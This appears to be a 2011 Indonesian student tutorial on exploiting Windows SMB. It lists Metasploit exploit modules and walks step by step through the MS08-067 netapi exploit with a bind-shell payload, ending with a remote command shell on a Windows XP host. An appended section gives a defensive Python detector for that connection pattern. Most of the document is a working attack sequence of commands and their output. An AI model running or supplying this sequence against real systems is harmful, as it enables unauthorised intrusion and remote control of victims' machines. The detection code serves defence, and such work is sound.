
JURNAL LOCAL CHAPTER WWW.SCRIBD.COM/MUZAMMIL_06



Exploit SMB (Server Message Block Protocol) Windows
Abdullah Al Muzammil
www.portme.net | www.jagabayasecurity.com
muzammil06@yahoo.co.id | muzammil06@gmail.com

Teknik Informatika
STMIK AKAKOM YOGYAKARTA
2011

1. Introduction

SMB
Server Message Block, abbreviated SMB, is an information-technology term for a client/server protocol intended to provide file sharing within a network. The protocol is most often used in Microsoft Windows and IBM OS/2; UNIX-based operating systems can also use it through additional software called SAMBA (Wikipedia: http://id.wikipedia.org/wiki/Server_Message_Block).

Exploit
An exploit is code that attacks computer security in a specific way. Exploits are widely used for penetration, whether legal or illegal, to find weaknesses (vulnerabilities) on a target computer. An exploit can also be described as software that attacks a specific security vulnerability but does not always aim to carry out an unwanted action; many computer security researchers use exploits to demonstrate that a system has a vulnerability.
2. Implementation

For SMB, the exploit modules available to choose from are:
use exploit/windows/smb/ms03_049_netapi
use exploit/windows/smb/ms06_066_nwapi
use exploit/windows/smb/psexec
use exploit/windows/smb/ms04_007_killbill
use exploit/windows/smb/ms06_066_nwwks
use exploit/windows/smb/smb_relay
use exploit/windows/smb/ms04_011_lsass
use exploit/windows/smb/ms06_070_wkssvc
use exploit/windows/smb/timbuktu_plughntcommand_bof
use exploit/windows/smb/ms04_031_netdde
use exploit/windows/smb/ms07_029_msdns_zonename
use exploit/windows/smb/ms06_025_rasmans_reg
use exploit/windows/smb/ms09_050_smb2_negotiate_func_index
use exploit/windows/smtp/ms03_046_exchange2000_xexch50
use exploit/windows/smb/ms06_025_rras
use exploit/windows/smb/ms10_061_spoolss
use exploit/windows/smtp/wmailserver
use exploit/windows/smb/ms06_040_netapi
use exploit/windows/smb/netidentity_xtierrpcpipe
use exploit/windows/smtp/ypops_overflow1
use exploit/windows/smtp/mailcarrier_smtp_ehlo
use exploit/windows/smb/ms05_039_pnp
use exploit/windows/smb/ms08_067_netapi
use exploit/windows/smtp/mercury_cram_md5

msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   RHOST                     yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Exploit target:

   Id  Name
   0   Automatic Targeting


msf exploit(ms08_067_netapi) > set RHOST 192.168.36.101
RHOST => 192.168.36.101
msf exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   RHOST    192.168.36.101   yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Exploit target:

   Id  Name
   0   Automatic Targeting


msf exploit(ms08_067_netapi) > set PAYLOAD windows/shell/bind_
set PAYLOAD windows/shell/bind_ipv6_tcp   set PAYLOAD windows/shell/bind_nonx_tcp   set PAYLOAD windows/shell/bind_tcp
msf exploit(ms08_067_netapi) > set PAYLOAD windows/shell/bind_tcp
PAYLOAD => windows/shell/bind_tcp
msf exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   RHOST    192.168.36.101   yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Payload options (windows/shell/bind_tcp):

   Name      Current Setting  Required  Description
   EXITFUNC  thread           yes       Exit technique: seh, thread, process, none
   LPORT     4444             yes       The listen port
   RHOST     192.168.36.101   no        The target address

Exploit target:

   Id  Name
   0   Automatic Targeting


msf exploit(ms08_067_netapi) > exploit

[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (240 bytes) to 192.168.36.101
[*] Command shell session 1 opened (192.168.36.138:332 -> 192.168.36.101:4444) at 2011-12-01 13:11:36 +0700

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>
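As an added defender-side example that is not part of the original paper: the transcript above shows what a bind-shell payload leaves on the wire, an SMB connection to the target followed shortly by a new inbound connection from the same source to the payload's LPORT (4444). The Python below, written for this page, flags that sequence in a constructed connection log; the log format, the 60-second window and the baseline set of expected service ports are assumptions.

```python
"""Flag the bind-shell pattern from the walkthrough: SMB (139/445) contact from
a source host, followed within a short window by a new inbound connection
from the same source to a port that is not a known service on the target."""
from datetime import datetime, timedelta

# Constructed sample connection log (not a real capture): "ts src -> dst state"
SAMPLE_LOG = """\
2011-12-01T13:11:20+07:00 192.168.36.138:41022 -> 192.168.36.101:445 SYN
2011-12-01T13:11:21+07:00 192.168.36.50:51010 -> 192.168.36.101:445 SYN
2011-12-01T13:11:36+07:00 192.168.36.138:41030 -> 192.168.36.101:4444 SYN
2011-12-01T13:15:00+07:00 192.168.36.50:51040 -> 192.168.36.101:139 SYN
"""

SMB_PORTS = {139, 445}
# Assumed baseline of services legitimately listening on the monitored host.
EXPECTED_PORTS = {80, 139, 445, 3389}


def parse_line(line):
    """Split one constructed log line into (timestamp, src_ip, dst_ip, dst_port)."""
    ts, src, _arrow, dst, _state = line.split()
    src_ip, _src_port = src.rsplit(":", 1)
    dst_ip, dst_port = dst.rsplit(":", 1)
    return datetime.fromisoformat(ts), src_ip, dst_ip, int(dst_port)


def find_bind_shell_candidates(log_text, window_s=60, expected=EXPECTED_PORTS):
    """Return (src, dst, port) for every connection that follows an SMB contact
    from the same src to the same dst within window_s seconds and lands on a
    port outside the expected service baseline (the bind-shell LPORT pattern)."""
    last_smb = {}  # (src, dst) -> time of the most recent SMB connection
    alerts = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, port = parse_line(line)
        if port in SMB_PORTS:
            last_smb[(src, dst)] = ts
            continue
        seen = last_smb.get((src, dst))
        if seen and ts - seen <= timedelta(seconds=window_s) and port not in expected:
            alerts.append((src, dst, port))
    return alerts


if __name__ == "__main__":
    for src, dst, port in find_bind_shell_candidates(SAMPLE_LOG):
        print(f"ALERT: {src} reached SMB on {dst}, then connected to {dst}:{port}")
```

The same check can be pointed at firewall or NetFlow exports once the parser is adapted; a host that answers on 445 and then acquires a new listener is also worth a patch-level check, since MS08-067 is fixed by the vendor update the module name refers to.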
